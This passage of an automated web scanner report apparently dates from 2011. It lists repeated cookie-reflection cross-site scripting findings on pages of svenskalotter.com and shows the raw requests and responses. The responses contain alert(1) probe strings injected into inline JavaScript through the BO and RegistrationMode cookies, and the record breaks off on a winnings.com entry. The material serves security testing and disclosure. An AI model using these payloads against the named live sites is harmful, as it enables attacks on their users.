"FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.svenskalotter |
Path: | /Help.aspx |
GET /Help.aspx HTTP/1.1 Host: www.svenskalotter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:37:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/ Set-Cookie: BO=FMb1cf0"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/ Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/ Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 36193 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMb1cf0"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.svenskalotter |
Path: | /Help.aspx |
GET /Help.aspx HTTP/1.1 Host: www.svenskalotter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:37:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMfe8c3" Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:19 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:19 GMT; path=/ Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:19 GMT; path=/ Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 36193 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMfe8c3"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.svenskalotter |
Path: | /InviteFriend.aspx |
GET /InviteFriend.aspx HTTP/1.1 Host: www.svenskalotter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:37:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/ Set-Cookie: BO=FM3bde2"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/ Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/ Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 47073 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM3bde2"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.svenskalotter |
Path: | /InviteFriend.aspx |
GET /InviteFriend.aspx HTTP/1.1 Host: www.svenskalotter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:37:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM4bcc1" Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:18 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:18 GMT; path=/ Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:18 GMT; path=/ Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 47073 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM4bcc1"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.svenskalotter |
Path: | /PlayersClub.aspx |
GET /PlayersClub.aspx HTTP/1.1 Host: www.svenskalotter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:37:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/ Set-Cookie: BO=FMb012a"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/ Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/ Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 41598 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMb012a"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.svenskalotter |
Path: | /PlayersClub.aspx |
GET /PlayersClub.aspx HTTP/1.1 Host: www.svenskalotter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:37:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMef139" Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:19 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:19 GMT; path=/ Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:19 GMT; path=/ Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 41598 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMef139"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.svenskalotter |
Path: | /Promotions.aspx |
GET /Promotions.aspx HTTP/1.1 Host: www.svenskalotter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:37:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:33 GMT; path=/ Set-Cookie: BO=FMdedde"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:33 GMT; path=/ Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:33 GMT; path=/ Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 38345 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMdedde"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.svenskalotter |
Path: | /Promotions.aspx |
GET /Promotions.aspx HTTP/1.1 Host: www.svenskalotter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:37:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMbd889" Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:21 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:21 GMT; path=/ Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:21 GMT; path=/ Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 38345 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMbd889"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.svenskalotter |
Path: | /Responsible.aspx |
GET /Responsible.aspx HTTP/1.1 Host: www.svenskalotter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:37:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:41 GMT; path=/ Set-Cookie: BO=FMbd471"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:41 GMT; path=/ Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:41 GMT; path=/ Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 42103 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMbd471"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.svenskalotter |
Path: | /Responsible.aspx |
GET /Responsible.aspx HTTP/1.1 Host: www.svenskalotter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:37:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM364f9" Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/ Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/ Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 42103 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM364f9"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.svenskalotter |
Path: | /SecurityAndPrivacy.aspx |
GET /SecurityAndPrivacy.aspx HTTP/1.1 Host: www.svenskalotter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:37:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:33 GMT; path=/ Set-Cookie: BO=FM8d17f"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:33 GMT; path=/ Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:33 GMT; path=/ Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 35242 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM8d17f"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.svenskalotter |
Path: | /SecurityAndPrivacy.aspx |
GET /SecurityAndPrivacy.aspx HTTP/1.1 Host: www.svenskalotter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:37:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM81d92" Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:22 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:22 GMT; path=/ Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:22 GMT; path=/ Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 35242 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM81d92"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.svenskalotter |
Path: | /Terms.aspx |
GET /Terms.aspx HTTP/1.1 Host: www.svenskalotter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:37:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:45 GMT; path=/ Set-Cookie: BO=FM1c550"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:45 GMT; path=/ Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:45 GMT; path=/ Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 99979 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM1c550"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.svenskalotter |
Path: | /Terms.aspx |
GET /Terms.aspx HTTP/1.1 Host: www.svenskalotter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:37:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM48d45" Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:30 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:30 GMT; path=/ Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:30 GMT; path=/ Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 99979 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM48d45"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.svenskalotter |
Path: | /UnderAge.aspx |
GET /UnderAge.aspx HTTP/1.1 Host: www.svenskalotter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:37:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:45 GMT; path=/ Set-Cookie: BO=FM8028c"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:45 GMT; path=/ Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:45 GMT; path=/ Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 34831 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM8028c"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.svenskalotter |
Path: | /UnderAge.aspx |
GET /UnderAge.aspx HTTP/1.1 Host: www.svenskalotter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:37:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMb7950" Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:34 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:34 GMT; path=/ Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:34 GMT; path=/ Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 34831 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMb7950"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.svenskalotter |
Path: | /click/Svenskalotter.com |
GET /click/Svenskalotter.com Host: www.svenskalotter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:38:11 GMT; path=/ Set-Cookie: BO=FM88356"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:38:11 GMT; path=/ Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:38:11 GMT; path=/ Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 34629 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM88356"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.svenskalotter |
Path: | /click/Svenskalotter.com |
GET /click/Svenskalotter.com Host: www.svenskalotter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMbb647" Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:38:00 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:38:00 GMT; path=/ Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:38:00 GMT; path=/ Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 34629 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMbb647"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.winnings.com |
Path: | /how-to-win-money |
GET /how-to-win-money HTTP/1.1 Host: www.winnings.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: qtrans_cookie_test |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT ETag: "" Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.13 Set-Cookie: qtrans_cookie_test Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:43:45 GMT; path=/; domain=.winnings.com Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:43:45 GMT; path=/; domain=.winnings.com X-Pingback: http://winnings.com Date: Mon, 16 May 2011 12:43:47 GMT Connection: close Content-Length: 22360 <!DOCTYPE html> <html dir="ltr" lang="en-US"> <head> <meta charset="UTF-8" /> <meta http-equiv="X-UA <title>Cash Prizes - Learn how to make money online | H ...[SNIP]... ', ' + gid;gid = '&GID=' + gid;}window.open('https:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.winnings.com |
Path: | /how-to-win-money |
GET /how-to-win-money HTTP/1.1 Host: www.winnings.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: qtrans_cookie_test |
